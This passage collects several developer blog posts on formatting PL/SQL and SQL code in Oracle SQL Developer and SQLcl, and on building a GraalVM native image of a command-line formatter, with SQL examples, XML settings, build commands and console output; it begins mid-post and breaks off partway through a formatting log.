Driving from home to the office was like a “fade in”. While listening to my favorite radio station with news, music and jokes I thought about what work I had to do at the office. When I arrived I was ready for work. I knew exactly what I wanted to start with.

It was similar on the way home. Like a “fade out”. I left the office after finishing some unit of work. In my car I listened to music and enjoyed being alone. When I arrived at home I was really there and was interested to hear about my wife's day. Nowadays it's more like an interruption of work. Not a real closure. It's as if my mind and my body are not in the same place. And guess who figures that out every single day?

It sounds strange, but I miss commuting.

4 Kilograms

That’s the weight I gained during this time. The temptations at home are simply too strong. I guess I need to start working on my self-control.

Conclusion

When I look at the list, I feel pretty privileged. I still have a job. I like my work. My family is healthy so far. I have no real reason to complain.

The post Work From Home – First Anniversary appeared first on Philipp Salvisberg's Blog.


Lightweight Formatter for PL/SQL & SQL


TL;DR

Bye bye heavyweight formatter. Long live the lightweight formatter. Are you using Oracle’s SQL Developer or SQLcl? Then install these settings and press Ctrl-F7 to produce code that conforms to the Trivadis PL/SQL & SQL Coding Style. A compromise between conformity and individuality.

Heavyweight Formatter

A typical PL/SQL & SQL formatter replaces the whitespace between lexical tokens by default with a single space. Whitespace consists of a series of spaces, tabs and line breaks. As a result, the original whitespace between the tokens is lost. The grammars for SQL*Plus, PL/SQL and SQL are huge. As a consequence, a single space is not the desired result in many cases. Therefore, a formatter comes with a large set of rules and options to override the default (a single space between tokens).

A key feature of a heavyweight formatter is that it produces the same result regardless of how the original code was formatted. There is no room for individuality unless it is part of a rule and its configuration. This makes a complete formatter a heavyweight.

Here is a create view example. Once formatted with spaces between the tokens and once with line breaks between the tokens.

create view v as select empno , ename from emp ;

create 
view 
v 
as 
select 
empno
, 
ename 
from 
emp
;

Here are the formatter results for some popular integrated development environments for PL/SQL & SQL. I configured the tools with these settings based on the Trivadis PL/SQL & SQL Coding Style. For SQL Developer I loaded only the .xml file and used the default custom formatting rules (Arbori program).


create view v as
   select empno,
          ename
     from emp;

create view v as
   select empno,
          ename
     from emp;


select empno, ename
  from emp;

select empno, ename
  from emp;

Allround Automations PL/SQL Developer cannot parse create view statements. Therefore I formatted just the subquery part of the view.

create view v
as
   select empno, ename from emp;

create view v
as
   select empno, ename from emp;

All tools produced the same result for both variants of the statement. However, the result differs between the tools, although the configuration is based on the same code style. Why is that so? Let’s look at the code style to answer this question.

Trivadis Formatting Rules

The Trivadis PL/SQL & SQL Coding Guidelines contains the following rules for code formatting in the Code Style chapter:

  1. Keywords and names are written in lowercase
  2. 3 space indentation.
  3. One command per line.
  4. Keywords loop, else, elsif, end if, when on a new line.
  5. Commas in front of separated elements.
  6. Call parameters aligned, operators aligned, values aligned.
  7. SQL keywords are right aligned within a SQL command.
  8. Within a program unit only line comments -- are used.
  9. Brackets are used when needed or when helpful to clarify a construct.

When you go through the list, you find out that only rule 5 has been violated. However, this violation was intentional. I use trailing commas whenever I’m allowed to and therefore I changed the default. A privilege of the maintainer. You like leading commas? No problem. You can configure whatever you want in the preferences of SQL Developer.

The point is, all rules are vaguely worded and leave a lot of room for interpretation. Furthermore, rules 1, 8 and 9 are about code style, but not about the formatting of code. Code formatting should be exclusively about whitespace between tokens. Extending the scope can be dangerous and break the code, e.g. when using JSON dot notation, which uses case-sensitive identifiers.

These rules are a good starting point for a developer who knows PL/SQL & SQL. However, they leave a lot of freedom when configuring a formatter. And they are for sure not suitable as a specification for a formatter.

Lightweight Formatter

A lightweight formatter preserves whitespace between lexical tokens by default. Based on a set of rules and options, the whitespace between tokens is then fixed. This allows the lightweight formatter to produce a reasonable result with a small set of rules.

Let's compare a minimalistic heavyweight and a minimalistic lightweight formatter. Neither formatter implements any rules. Each just returns its default whitespace between tokens.

Here’s the formatter input based on an example from the SQL Language Reference:

CREATE TABLESPACE auto_seg_ts DATAFILE 'file_2.dbf' SIZE 1M
   EXTENT MANAGEMENT LOCAL
   SEGMENT SPACE MANAGEMENT AUTO;

The minimalistic heavyweight formatter produces this result:

create tablespace auto_seg_ts datafile 'file_2.dbf' size 1 M extent management local segment space management auto ;

And the minimalistic lightweight formatter produces this result:

create tablespace auto_seg_ts datafile 'file_2.dbf' size 1M
   extent management local
   segment space management auto;

Both formatters changed the case of the keywords and preserved the case of the identifiers. The heavyweight formatter placed a single space between the lexical tokens, while the lightweight formatter preserved the whitespace. The result of the lightweight formatter looks good because the input was formatted reasonably.

Advantages of a Lightweight Formatter

I'm pretty sure that there are no formal formatting rules for a create tablespace statement. As a developer I very seldom write or read such statements. The formatting of this code is not that important to me. Both formatter outputs are acceptable, even if I like the second one better. However, when the create tablespace statement contains several file_specification clauses, some line breaks would indeed help to improve readability.

For me it is completely okay to preserve the original format for a lot of statements such as create tablespace, create database, create user, etc.

However I’d like to format code within the following SQL statements:

  • create function
  • create package
  • create package body
  • create procedure
  • create trigger
  • create type
  • create type body
  • create view
  • delete
  • insert
  • merge
  • select
  • update

An advantage of a lightweight formatter is that you can implement it incrementally. It is similar to a linter with automatic correction capabilities. Ok, this is probably not that interesting from the user’s point of view.

Another advantage of a lightweight formatter is that you can support various code styles. For example you can accept select empno, ename from emp; on a single line. But you can also accept optional line breaks before the from_clause or between elements in the select_list. All variants are compliant with the mentioned code style.

Disadvantages of a Lightweight Formatter

Simply put, a lightweight formatter is a compromise between conformity and individuality. You cannot call the formatter to ensure conformity regardless of the input.

There are a lot of undefined areas where no rules exist. And the developer in fact has the freedom to choose a fitting formatting style in such cases. In my opinion, that's fine. And I hope that most developers will love it.

State of the Trivadis PL/SQL & SQL Formatter Settings

Originally, the Trivadis PL/SQL & SQL Formatter Settings were based on the heavyweight formatter provided by the SQL Developer team. 90% of the Arbori code was their code. I added and changed some Arbori code to make the formatter result better match my expectations.

However, I was never really happy with this approach. Why? Because I had to compare the original Arbori code with every new SQL Developer and SQLcl version. Identifying changes was easy. But understanding the reason for a change was usually a challenge. Some changes were in conflict with “my” code base. As a result, maintenance became more and more cumbersome.

SQL Developer 20.4.1 and SQLcl 21.1.0 are the first versions for which the lightweight formatter settings are available. At the same time we stopped providing settings based on the heavyweight formatter. If you need a heavyweight formatter to enforce conformity of your code, then you have to rely on the code base provided by the SQL Developer team.

The main branch requires the latest versions of SQL Developer and SQLcl. This is currently version 21.2.0 for both products. In my opinion the lightweight formatter produces reasonable code. Thanks to the rule-based implementation and a unified token-based logging strategy, it is much easier to identify which rule is responsible for a particular whitespace change. There are test cases for each rule and a first set of test cases for major grammar elements. At the moment there are more than 470 test cases for about 4000 lines of Arbori code. It's not perfect, but I really think that the state of the formatter settings is much better than it ever was before.

If you find strange formatter results then please let us know by opening a GitHub issue. Thank you.

Really Lightweight?

In some areas the formatter behaves like a heavyweight formatter without tolerance for individuality.

One reason is that strangely formatted input code should produce reasonably formatted code. See these JUnit test cases for some examples.

Another reason is that we wanted to apply the calculated indentation to relevant parts of the parse tree. This really helps while writing code. Nobody wants to count spaces. Pressing Ctrl-F7 to format the code from time to time is much easier. The calculation of the indentation is the most elaborate and extensive code in the current Arbori code base. As a result, some individuality is lost.

Don’t worry, there is enough individuality left. The following examples show different formatting results using the same formatter settings (Trivadis defaults, “Line Breaks On subqueries” unchecked).

The reason for the different results are additional line breaks in the formatter input.


select e.empno, e.ename, e.job from emp e where e.deptno in (select d.deptno from dept d where d.loc in ('DALLAS', 'CHICAGO'));


select e.empno, e.ename, e.job
  from emp e
 where e.deptno in (select d.deptno from dept d where d.loc in ('DALLAS', 'CHICAGO'));


select e.empno, e.ename, e.job
  from emp e
 where e.deptno in (select d.deptno
                      from dept d
                     where d.loc in ('DALLAS', 'CHICAGO'));


select e.empno, e.ename, e.job
  from emp e
 where e.deptno in (
          select d.deptno
            from dept d
           where d.loc in ('DALLAS', 'CHICAGO'));


select e.empno,
       e.ename,
       e.job
  from emp e
 where e.deptno
       in
       (
          select d.deptno
            from dept d
           where d.loc
                 in
                 (
                    'DALLAS', 'CHICAGO'
                 )
       );

The “tokenized” result is based on an input where each token is placed on a separate line. It shows where line breaks are lost. For example, the second list entry 'CHICAGO' cannot be on a separate line. Short expressions are kept on the same line. Short means less than 50% of the configured maximum line width.

For create view, select, insert, update, delete, merge statements and PL/SQL code I consider the formatter a middleweight. For all other statements (e.g. create tablespace) it is really a lightweight.

The formatter is also capable of indenting single-line and multi-line comments. This is something that SQL Developer’s default formatter cannot do yet.

I hope you like the mix of conformity and individuality.

The post Lightweight Formatter for PL/SQL & SQL appeared first on Philipp Salvisberg's Blog.

Do Not Format Invalid Code in SQL Developer


Introduction

What happens when you call the formatter in SQL Developer for invalid code? Until recently SQL Developer tried to format it anyway. This produced strange results in some cases. Starting with SQL Developer version 21.2.0 there is a hidden option to suppress formatting when the code is invalid.

What Is Valid Code?

If the code can be compiled and executed, it is valid. Right? – Well, SQL Developer uses a parser written in Java. The resulting lexer token stream and the parse tree are essential inputs for the formatter. If the parser does not understand the code, it produces a partial parse tree. This means the parse tree is incomplete. In such cases the formatting result is unreliable. And it does not matter whether the code can be compiled and executed.

Here’s an example of a valid SQL statement that produces a query result but still reports a syntax error.
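
It is the same statement that is used in the section “The Problem” below; the having clause is written before the group by clause:

select constraint_name
from user_cons_columns c
where c.table_name = 'EMP'
having count(1) = 1
group by constraint_name;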

There are three options in SQL Developer to spot a syntax error in an editor.

  1. A pinkish wavy line below the token (group) in the editor that is responsible for the syntax error. When you hover over it, a pop-up window with additional information appears.
  2. A pink area on the right border of the editor. When you hover over it, a pop-up window with the code excerpt appears. When you click on it, the cursor is positioned on the token (group) with the pinkish wavy line.
  3. Syntax error; Partial parse tree: is shown as the first line in the code outline window.

According to the SQL Language Reference 21c this syntax is not allowed.

However, Oracle's implementation allows writing the HAVING clause before the GROUP BY clause. That's a fact.

As you can see, it is not so easy to write a complete parser based only on the documentation.

The Problem

When I call the formatter in SQL Developer with my favorite formatter settings for this code

select
   constraint_name
from
   user_cons_columns c
where
   c.table_name = 'EMP'
having
   count(1) = 1
group by
   constraint_name;

then I get the following result:

select constraint_name
  from user_cons_columns c
 where c.table_name = 'EMP'
having count(1) = 1
group by
   constraint_name;

When I fix the syntax error (from a SQL Developer’s parser perspective) in the original code like this:

select
   constraint_name
from
   user_cons_columns c
where
   c.table_name = 'EMP'
group by
   constraint_name
having
   count(1) = 1;

then the formatter result is:

select constraint_name
  from user_cons_columns c
 where c.table_name = 'EMP'
 group by constraint_name
having count(1) = 1;

In this example the difference is small: just the group by clause, which could not be formatted because of the syntax error. However, in other cases the formatter result might be really weird. So in my opinion it is better not to format invalid code.

The Solution

Open the preferences in SQL Developer and export the Advanced Format settings as shown in this screenshot.

Then open the exported XML file in an editor and add the line <formatWhenSyntaxError>false</formatWhenSyntaxError> as shown at the end of the listing below:

<options><adjustCaseOnly>false</adjustCaseOnly>
<alignTabColAliases>true</alignTabColAliases>
<breakOnSubqueries>true</breakOnSubqueries>
<alignEquality>false</alignEquality>
<singleLineComments>oracle.dbtools.app.Format.InlineComments.CommentsUnchanged</singleLineComments>
<breakAnsiiJoin>false</breakAnsiiJoin>
<maxCharLineSize>128</maxCharLineSize>
<alignAssignments>false</alignAssignments>
<breaksProcArgs>false</breaksProcArgs>
<alignRight>false</alignRight>
<breaksComma>oracle.dbtools.app.Format.Breaks.After</breaksComma>
<breaksAroundLogicalConjunctions>oracle.dbtools.app.Format.Breaks.Before</breaksAroundLogicalConjunctions>
<alignNamedArgs>true</alignNamedArgs>
<formatProgramURL>default</formatProgramURL>
<formatThreshold>1</formatThreshold>
<spaceAroundOperators>true</spaceAroundOperators>
<useTab>false</useTab>
<idCase>oracle.dbtools.app.Format.Case.lower</idCase>
<extraLinesAfterSignificantStatements>oracle.dbtools.app.Format.BreaksX2.X2</extraLinesAfterSignificantStatements>
<breaksConcat>oracle.dbtools.app.Format.Breaks.Before</breaksConcat>
<spaceAroundBrackets>oracle.dbtools.app.Format.Space.Default</spaceAroundBrackets>
<flowControl>oracle.dbtools.app.Format.FlowControl.IndentedActions</flowControl>
<commasPerLine>5</commasPerLine>
<forceLinebreaksBeforeComment>false</forceLinebreaksBeforeComment>
<alignTypeDecl>true</alignTypeDecl>
<breakParenCondition>false</breakParenCondition>
<parseForwardAndBackward>true</parseForwardAndBackward>
<identSpaces>4</identSpaces>
<breaksAfterSelect>true</breaksAfterSelect>
<spaceAfterCommas>true</spaceAfterCommas>
<kwCase>oracle.dbtools.app.Format.Case.UPPER</kwCase>
<formatWhenSyntaxError>false</formatWhenSyntaxError>
</options>

Save the file and import it into the preferences of SQL Developer. It’s the same screen as before, but this time use the Import button.

Afterwards, SQL Developer will format valid code only.

The latest Trivadis PL/SQL & SQL Formatter Settings also use <formatWhenSyntaxError>false</formatWhenSyntaxError>.

Summary

Now you can decide whether you want to format code with syntax errors in SQL Developer. I recommend not formatting invalid code. In most cases you will not be satisfied with the result anyway. And with larger files, you may not realize until much later that undo is no longer a simple keyboard shortcut.

Many thanks to the SQL Developer team and especially to Vadim Tropashko for implementing this enhancement request.

The post Do Not Format Invalid Code in SQL Developer appeared first on Philipp Salvisberg's Blog.

GraalVM Native Image – First Impressions


Introduction

A native image is an operating system specific executable file. You can build such an image for basically every application running on a Java virtual machine. This approach promises faster start-up times and lower resource consumption. This makes it appealing for serverless computing, auto-scaling platforms and command line tools.

I gained some impressions of this GraalVM technology while developing a standalone command line tool for formatting PL/SQL and SQL code. In this blog post I share some personal experiences and thoughts.

Starting Point

My starting point is an executable JAR. I can run it from the command line via java -jar tvdformat.jar. The main class com.trivadis.plsql.formatter.TvdFormat calls a JavaScript file format.js and passes all command line parameters to it. Behind the scenes, Oracle's parser and formatter, which are part of SQLcl and SQL Developer, do the heavy lifting.

It's quite obvious that this Java application loads a lot of classes and resources dynamically. GraalVM's native image builder can identify such objects with the tracing agent. Using the agent is simple. You start the Java application with an additional parameter. The idea is to run the application long enough to detect all dynamically loaded classes and resources. Technically, the tracing agent intercepts the calls involved in that dynamic loading process. It's a best-effort approach. It cannot guarantee completeness.

The next command shows how I run the formatter with the tracing agent for a small PL/SQL project:

java -agentlib:native-image-agent=config-output-dir=config \
     -jar tvdformat.jar $HOME/github/plscope-utils \
     xml=$HOME/github/trivadis/plsql-formatter-settings/settings/sql_developer/trivadis_advanced_format.xml \
     arbori=$HOME/github/trivadis/plsql-formatter-settings/settings/sql_developer/trivadis_custom_format.arbori

This command formats 56 files, and the tracing agent produces 6 JSON configuration files in the config directory.

jni-config.json

Configuration file for parameter -H:JNIConfigurationFiles. See documentation.

predefined-classes-config.json

Configuration file for parameter -H:PredefinedClassesConfigurationFiles.

proxy-config.json

Configuration file for parameter -H:DynamicProxyConfigurationFiles. See documentation.

reflect-config.json

Configuration file for parameter -H:ReflectionConfigurationFiles. See documentation.

resource-config.json

Configuration file for parameter -H:ResourceConfigurationFiles. See documentation.

serialization-config.json

Configuration file for parameter -H:SerializationConfigurationFiles. “The serialization support ensures constructors for classes are contained in a native image, so that they can be deserialized in the first place”. See release notes of GraalVM 21.0.0.

Environment

The environment for this experiment was:

  • MacBook Pro (16-inch, 2021) with an Apple M1 Max chip and 64 GB memory running on macOS Monterey 12.0.1
  • GraalVM CE 21.3.0 (build 17.0.1+12-jvmci-21.3-b05)
  • Apache Maven 3.8.3
  • SQLcl: Release 21.4.0.0 Production Build: 21.4.0.348.1716, installed in /usr/local/bin/sqlcl
  • Standalone PL/SQL & SQL Formatter at commit b4d26bd installed in $HOME/trivadis/plsql-formatter-settings
    • tvdformat.jar produced via mvn -DskipTests=true package in the standalone/target subdirectory
    • zip -d tvdformat-21.4.1-SNAPSHOT.jar "META-INF/native-image/*" to remove the native-image configuration files (they would be automatically used otherwise)
  • plscope-utils at commit 0687f5c installed in $HOME/github/plscope-utils

You find the configuration files used in this blog post in this Gist.

Building Image With Tracing Agent’s Config Files

Let’s try to build a native image with these configuration files.

$JAVA_HOME/bin/native-image \
-cp /usr/local/bin/sqlcl/lib/dbtools-common.jar:\
tvdformat-21.4.1-SNAPSHOT.jar \
-H:JNIConfigurationFiles=config/jni-config.json \
-H:PredefinedClassesConfigurationFiles=config/predefined-classes-config.json \
-H:DynamicProxyConfigurationFiles=config/proxy-config.json \
-H:ReflectionConfigurationFiles=config/reflect-config.json \
-H:ResourceConfigurationFiles=config/resource-config.json \
-H:SerializationConfigurationFiles=config/serialization-config.json \
-H:+ReportExceptionStackTraces \
--language:js \
-H:Class=com.trivadis.plsql.formatter.TvdFormat \
-H:Name=tvdformat

Here’s the console output:

[tvdformat:15574]    classlist:   3,420.59 ms,  0.96 GB
[tvdformat:15574]        (cap):   2,147.77 ms,  0.96 GB
[tvdformat:15574]        setup:   6,412.44 ms,  0.96 GB
[tvdformat:15574]     (clinit):   1,036.63 ms,  6.18 GB
[tvdformat:15574]   (typeflow):  16,832.01 ms,  6.18 GB
[tvdformat:15574]    (objects):  31,681.96 ms,  6.18 GB
[tvdformat:15574]   (features):  12,333.23 ms,  6.18 GB
[tvdformat:15574]     analysis:  63,801.37 ms,  6.18 GB
[tvdformat:15574]     universe:   3,216.66 ms,  6.18 GB
10971 method(s) included for runtime compilation
[tvdformat:15574]      (parse):  11,562.89 ms,  6.14 GB
[tvdformat:15574]     (inline):   6,112.92 ms,  7.19 GB
[tvdformat:15574]    (compile):  35,886.56 ms,  7.23 GB
[tvdformat:15574]      compile:  58,027.14 ms,  7.07 GB
[tvdformat:15574]        image:   5,407.78 ms,  7.07 GB
[tvdformat:15574]        write:   2,973.57 ms,  7.07 GB
[tvdformat:15574]      [total]: 147,632.30 ms,  7.07 GB
# Printing build artifacts to: /Users/phs/github/trivadis/plsql-formatter-settings/standalone/target/tvdformat.build_artifacts.txt

No error messages. Great. And what's the size of the tvdformat executable? 115 megabytes. The main contributor is the --language:js parameter, which probably includes a bit more than necessary.

Anyway, let’s run the native image.

./tvdformat $HOME/github/plscope-utils \
xml=$HOME/github/trivadis/plsql-formatter-settings/settings/sql_developer/trivadis_advanced_format.xml \
arbori=$HOME/github/trivadis/plsql-formatter-settings/settings/sql_developer/trivadis_custom_format.arbori

This call produces the following console output:

Exception in thread "main" javax.script.ScriptException: org.graalvm.polyglot.PolyglotException: TypeError: Access to host class java.lang.String is not allowed or does not exist.
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.toScriptException(GraalJSScriptEngine.java:483)
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.eval(GraalJSScriptEngine.java:460)
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.eval(GraalJSScriptEngine.java:400)
	at com.trivadis.plsql.formatter.TvdFormat.run(TvdFormat.java:34)
	at com.trivadis.plsql.formatter.TvdFormat.main(TvdFormat.java:67)
Caused by: org.graalvm.polyglot.PolyglotException: TypeError: Access to host class java.lang.String is not allowed or does not exist.
	at <js>.:program(<eval>:23)
	at org.graalvm.polyglot.Context.eval(Context.java:379)
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.eval(GraalJSScriptEngine.java:458)
	... 3 more

The String class is used on line 23 in format.js. We need to register Java classes used in JavaScript and extend the configuration accordingly.

Extending Reflection Configuration (1)

I reviewed format.js and the JavaScript callback functions in trivadis_custom_format.arbori and created an additional configuration file reflect-config2.json for all Java classes used in JavaScript.

reflect-config2.json
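
The file content is a plain JSON array in GraalVM's reflection configuration format. Here is a minimal sketch; the entries shown are illustrative, the real file registers every class used in the scripts:

[
  {
    "name": "java.lang.String",
    "allPublicConstructors": true,
    "allPublicMethods": true
  },
  {
    "name": "java.util.ArrayList",
    "allPublicConstructors": true,
    "allPublicMethods": true
  }
]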


Now we can build the native image with this additional configuration file.

$JAVA_HOME/bin/native-image \
-cp /usr/local/bin/sqlcl/lib/dbtools-common.jar:\
tvdformat-21.4.1-SNAPSHOT.jar \
-H:JNIConfigurationFiles=config/jni-config.json \
-H:PredefinedClassesConfigurationFiles=config/predefined-classes-config.json \
-H:DynamicProxyConfigurationFiles=config/proxy-config.json \
-H:ReflectionConfigurationFiles=config/reflect-config.json,config/reflect-config2.json \
-H:ResourceConfigurationFiles=config/resource-config.json \
-H:SerializationConfigurationFiles=config/serialization-config.json \
-H:+ReportExceptionStackTraces \
--language:js \
-H:Class=com.trivadis.plsql.formatter.TvdFormat \
-H:Name=tvdformat

The build completes without errors and produces a native image of 138 MB, 23 MB larger than before. Let's run it.

The second run produces this console output:

Exception in thread "main" javax.script.ScriptException: org.graalvm.polyglot.PolyglotException: com.oracle.svm.core.jdk.UnsupportedFeatureError: Proxy class defined by interfaces [interface java.util.function.Predicate] not found. Generating proxy classes at runtime is not supported. Proxy classes need to be defined at image build time by specifying the list of interfaces that they implement. To define proxy classes use -H:DynamicProxyConfigurationFiles=<comma-separated-config-files> and -H:DynamicProxyConfigurationResources=<comma-separated-config-resources> options.
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.toScriptException(GraalJSScriptEngine.java:483)
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.eval(GraalJSScriptEngine.java:460)
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.eval(GraalJSScriptEngine.java:400)
	at com.trivadis.plsql.formatter.TvdFormat.run(TvdFormat.java:34)
	at com.trivadis.plsql.formatter.TvdFormat.main(TvdFormat.java:67)

An excellent error message. We need to configure the class java.util.function.Predicate via -H:DynamicProxyConfigurationFiles. Let’s do this.

Extending Dynamic Proxy Configuration

For this blog post I decided to create a second configuration file, proxy-config2.json, to distinguish it from the one generated by the tracing agent.
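
The dynamic proxy configuration is a JSON array of interface lists. A minimal sketch covering the reported interface, assuming the standard GraalVM format:

[
  {
    "interfaces": ["java.util.function.Predicate"]
  }
]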

Let’s build the native image with this additional configuration file.

$JAVA_HOME/bin/native-image \
-cp /usr/local/bin/sqlcl/lib/dbtools-common.jar:\
tvdformat-21.4.1-SNAPSHOT.jar \
-H:JNIConfigurationFiles=config/jni-config.json \
-H:PredefinedClassesConfigurationFiles=config/predefined-classes-config.json \
-H:DynamicProxyConfigurationFiles=config/proxy-config.json,config/proxy-config2.json \
-H:ReflectionConfigurationFiles=config/reflect-config.json,config/reflect-config2.json \
-H:ResourceConfigurationFiles=config/resource-config.json \
-H:SerializationConfigurationFiles=config/serialization-config.json \
-H:+ReportExceptionStackTraces \
--language:js \
-H:Class=com.trivadis.plsql.formatter.TvdFormat \
-H:Name=tvdformat

The build completed without errors and produced a native image of 138 MB, the same size as before. Let's run it.

The third run produces this console output:

Formatting file 1 of 56: /Users/phs/github/plscope-utils/README.md... done.
Formatting file 2 of 56: /Users/phs/github/plscope-utils/database/README.md... Exception in thread "main" javax.script.ScriptException: java.lang.Exception: java.lang.AssertionError: oracle.dbtools.arbori.ScriptException: java.lang.NumberFormatException: Cannot parse null string
	at oracle.dbtools.app.Format.format(Format.java:387)
	at <js>.formatMarkdownFile(<eval>:489)
	at <js>.formatFiles(<eval>:528)
	at <js>.run(<eval>:552)
	at <js>.:program(<eval>:617)
	at org.graalvm.polyglot.Context.eval(Context.java:379)
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.eval(GraalJSScriptEngine.java:458)
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.eval(GraalJSScriptEngine.java:400)
	at com.trivadis.plsql.formatter.TvdFormat.run(TvdFormat.java:34)
	at com.trivadis.plsql.formatter.TvdFormat.main(TvdFormat.java:67)
Caused by: java.lang.Exception: java.lang.AssertionError: oracle.dbtools.arbori.ScriptException: java.lang.NumberFormatException: Cannot parse null string
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.toScriptException(GraalJSScriptEngine.java:476)
	at com.oracle.truffle.js.scriptengine.GraalJSScriptEngine.eval(GraalJSScriptEngine.java:460)
	... 3 more

This is quite interesting. The embedded format.js works now. The first file, README.md, does not contain SQL text blocks, and therefore the formatter was not called and no error was reported. But the formatter failed for the second file. What could be the reason for NumberFormatException: Cannot parse null string? – In this case the ParseNode class could not be loaded dynamically. To load this class successfully, a lot of other classes are also required.

Extending Reflection Configuration (2)

Identifying all the dynamically loaded classes is not that simple. To debug the native image you can enable or add logging output, review the related source code or use a debugger. The native image debugger is an enterprise feature that is on the roadmap for the community edition. However, you still need to identify the reason for every single runtime exception. After adding the class to the configuration file, you need to rebuild the native image and run it to detect the next exception. Doing this manually is really time-consuming.

Another approach is to register classes and their constructors, methods and fields programmatically, using configuration with features. I've done that for a few chosen packages of the dbtools-common.jar that is part of the SQLcl installation. See the source on GitHub.
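
Here is a minimal sketch of such a feature, assuming the org.graalvm.nativeimage API; the class name and the single registered class are illustrative, the actual implementation linked above registers whole packages:

import org.graalvm.nativeimage.hosted.Feature;
import org.graalvm.nativeimage.hosted.RuntimeReflection;

public class RegisterDbtoolsClassesFeature implements Feature {

   @Override
   public void beforeAnalysis(BeforeAnalysisAccess access) {
      // look up a dynamically loaded class and register it with all its members
      Class<?> clazz = access.findClassByName("oracle.dbtools.parser.ParseNode");
      if (clazz != null) {
         RuntimeReflection.register(clazz);
         RuntimeReflection.register(clazz.getDeclaredConstructors());
         RuntimeReflection.register(clazz.getDeclaredMethods());
         RuntimeReflection.register(clazz.getDeclaredFields());
      }
   }
}

Such a feature is activated at build time via the --features option of the native-image command.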

For this blog post I created an additional configuration file with 218 classes.

reflect-config3.json


Let’s once more build the native image with an additional configuration file.

$JAVA_HOME/bin/native-image \
-cp /usr/local/bin/sqlcl/lib/dbtools-common.jar:\
tvdformat-21.4.1-SNAPSHOT.jar \
-H:JNIConfigurationFiles=config/jni-config.json \
-H:PredefinedClassesConfigurationFiles=config/predefined-classes-config.json \
-H:DynamicProxyConfigurationFiles=config/proxy-config.json,config/proxy-config2.json \
-H:ReflectionConfigurationFiles=\
config/reflect-config.json,config/reflect-config2.json,config/reflect-config3.json \
-H:ResourceConfigurationFiles=config/resource-config.json \
-H:SerializationConfigurationFiles=config/serialization-config.json \
-H:+ReportExceptionStackTraces \
--language:js \
-H:Class=com.trivadis.plsql.formatter.TvdFormat \
-H:Name=tvdformat

The build completed without errors and produced a native image of 145 MB, 7 MB larger than before. Let's run it.

The fourth run produces this console output:

Formatting file 1 of 56: /Users/phs/github/plscope-utils/README.md... done.
Formatting file 2 of 56: /Users/phs/github/plscope-utils/database/README.md... done.
Formatting file 3 of 56: /Users/phs/github/plscope-utils/database/demo/demo_script/00_demo_readme.sql... done.
Formatting file 4 of 56: /Users/phs/github/plscope-utils/database/demo/demo_script/01_demo_plscope.sql... done.
Formatting file 5 of 56: /Users/phs/github/plscope-utils/database/demo/demo_script/02_demo_lineage.sql... done.
Formatting file 6 of 56: /Users/phs/github/plscope-utils/database/demo/demo_script/03_demo_utl_xml_parsequery.sql... done.
Formatting file 7 of 56: /Users/phs/github/plscope-utils/database/demo/package/etl.pkb... done.
Formatting file 8 of 56: /Users/phs/github/plscope-utils/database/demo/package/etl.pks... done.
Formatting file 9 of 56: /Users/phs/github/plscope-utils/database/demo/synonym/source_syn.sql... done.
Formatting file 10 of 56: /Users/phs/github/plscope-utils/database/demo/table/dept.sql... done.
Formatting file 11 of 56: /Users/phs/github/plscope-utils/database/demo/table/deptsal.sql... done.
Formatting file 12 of 56: /Users/phs/github/plscope-utils/database/demo/table/deptsal_err.sql... done.
Formatting file 13 of 56: /Users/phs/github/plscope-utils/database/demo/table/drop_demo_tables.sql... done.
Formatting file 14 of 56: /Users/phs/github/plscope-utils/database/demo/table/emp.sql... done.
Formatting file 15 of 56: /Users/phs/github/plscope-utils/database/demo/view/source_view.sql... done.
Formatting file 16 of 56: /Users/phs/github/plscope-utils/database/install.sql... done.
Formatting file 17 of 56: /Users/phs/github/plscope-utils/database/install_test.sql... done.
Formatting file 18 of 56: /Users/phs/github/plscope-utils/database/test/package/test_dd_util.pkb... done.
Formatting file 19 of 56: /Users/phs/github/plscope-utils/database/test/package/test_dd_util.pks... done.
Formatting file 20 of 56: /Users/phs/github/plscope-utils/database/test/package/test_etl.pkb... done.
Formatting file 21 of 56: /Users/phs/github/plscope-utils/database/test/package/test_etl.pks... done.
Formatting file 22 of 56: /Users/phs/github/plscope-utils/database/test/package/test_lineage_util.pkb... done.
Formatting file 23 of 56: /Users/phs/github/plscope-utils/database/test/package/test_lineage_util.pks... done.
Formatting file 24 of 56: /Users/phs/github/plscope-utils/database/test/package/test_parse_util.pkb... done.
Formatting file 25 of 56: /Users/phs/github/plscope-utils/database/test/package/test_parse_util.pks... done.
Formatting file 26 of 56: /Users/phs/github/plscope-utils/database/test/package/test_plscope_context.pkb... done.
Formatting file 27 of 56: /Users/phs/github/plscope-utils/database/test/package/test_plscope_context.pks... done.
Formatting file 28 of 56: /Users/phs/github/plscope-utils/database/test/package/test_plscope_identifiers.pkb... done.
Formatting file 29 of 56: /Users/phs/github/plscope-utils/database/test/package/test_plscope_identifiers.pks... done.
Formatting file 30 of 56: /Users/phs/github/plscope-utils/database/test/package/test_type_util.pkb... done.
Formatting file 31 of 56: /Users/phs/github/plscope-utils/database/test/package/test_type_util.pks... done.
Formatting file 32 of 56: /Users/phs/github/plscope-utils/database/utils/context/plscope.ctx... done.
Formatting file 33 of 56: /Users/phs/github/plscope-utils/database/utils/package/dd_util.pkb... done.
Formatting file 34 of 56: /Users/phs/github/plscope-utils/database/utils/package/dd_util.pks... done.
Formatting file 35 of 56: /Users/phs/github/plscope-utils/database/utils/package/lineage_util.pkb... done.
Formatting file 36 of 56: /Users/phs/github/plscope-utils/database/utils/package/lineage_util.pks... done.
Formatting file 37 of 56: /Users/phs/github/plscope-utils/database/utils/package/parse_util.pkb... done.
Formatting file 38 of 56: /Users/phs/github/plscope-utils/database/utils/package/parse_util.pks... done.
Formatting file 39 of 56: /Users/phs/github/plscope-utils/database/utils/package/plscope_context.pkb... done.
Formatting file 40 of 56: /Users/phs/github/plscope-utils/database/utils/package/plscope_context.pks... done.
Formatting file 41 of 56: /Users/phs/github/plscope-utils/database/utils/package/type_util.pkb... done.
